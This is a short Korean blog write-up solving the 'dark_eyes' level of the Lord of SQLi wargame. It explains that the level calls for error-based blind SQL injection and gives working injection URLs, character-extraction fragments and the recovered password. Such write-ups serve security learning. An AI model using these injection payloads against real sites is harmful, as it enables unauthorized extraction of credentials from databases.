반응형

http://los.eagle-jump.org



그림을 클릭하여 들어갑니다




소스를 보니 error based blind sql injection임을 알 수있습니다


저번 단계에서 풀었던 방식인 if나 case가 막혀있으므로


error가 나오면 거짓 안나오면 참으로 풀어보겠습니다


답은 하얀색!!



http://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php?pw=%27OR%20id=%27admin%27%20and%20(ord(mid(pw,4,1))%3C103%20or%20(select%201%20union%20select%20pw))%20%23



(length(pw)<10%20or%20(select%201%20union%20select%20pw))%20



53 97 50 102 53 100 51 99 


5a2f5d3c




'Wargame > log.eagle-jump.org' 카테고리의 다른 글

[LOS] 문제24 Evil_wizard  (0) 2017.09.12
[LOS] 문제23 Hell_fire  (0) 2017.09.12
[LOS] 문제21 iron_golem  (0) 2017.09.11
[LOS] 문제20 Dragon  (0) 2017.09.11
[LOS] 문제19 Xavis  (0) 2017.09.11
  • 네이버 블러그 공유하기
  • 네이버 밴드에 공유하기
  • 페이스북 공유하기
  • 카카오스토리 공유하기